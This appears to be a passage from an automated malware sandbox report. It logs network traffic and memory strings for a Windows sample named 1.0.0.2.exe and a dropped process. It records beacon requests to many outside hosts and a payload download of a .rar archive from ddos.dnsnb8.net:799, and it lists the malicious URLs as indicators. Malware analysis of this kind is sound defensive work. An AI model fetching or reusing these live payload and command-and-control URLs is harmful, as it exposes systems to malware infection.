          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?554c8c=39131092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xs.jpg?5827cf=5777359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ad5654=34079484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
          Source: global trafficHTTP traffic detected: GET /xs.jpg?c12b4b=126595310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
          Source: global trafficHTTP traffic detected: GET /xs.jpg?e14213=73812575 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 85.17.167.196
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6B888 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetCloseHandle,InternetCloseHandle,0_2_02B6B888
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5059c3=10531718 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xs.jpg?51fbda=48356010 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?554c8c=39131092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xs.jpg?5827cf=5777359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ad5654=34079484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
          Source: global trafficHTTP traffic detected: GET /xs.jpg?c12b4b=126595310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
          Source: global trafficHTTP traffic detected: GET /xs.jpg?e14213=73812575 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
          Source: global trafficDNS traffic detected: DNS query: althawry.org
          Source: global trafficDNS traffic detected: DNS query: www.careerdesk.org
          Source: global trafficDNS traffic detected: DNS query: arthur.niria.biz
          Source: global trafficDNS traffic detected: DNS query: amsamex.com
          Source: global trafficDNS traffic detected: DNS query: apple-pie.in
          Source: global trafficDNS traffic detected: DNS query: ahmediye.net
          Source: global trafficDNS traffic detected: DNS query: g2.arrowhitech.com
          Source: global trafficDNS traffic detected: DNS query: ampyazilim.com.tr
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:07 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:11 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
          Source: rksowY.exe, 00000002.00000003.2147302621.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://127.0.0.1/R2_2021/ServerInfo.json
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.193.19.14/logo.gif
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a3inforservice.com.br/images/logof.gif
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accnet.ca/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359V
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?e14213=73812575
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=260706254
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625d
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?a6d450=65599968
          Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1.
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388
          Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M
          Source: 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;0
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430edK2
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?549590=27716560
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=94588921
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=945889216
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?554c8c=39131092
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?ce2fff=121614327
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=483560101
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010a
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T
          Source: rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
          Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar4
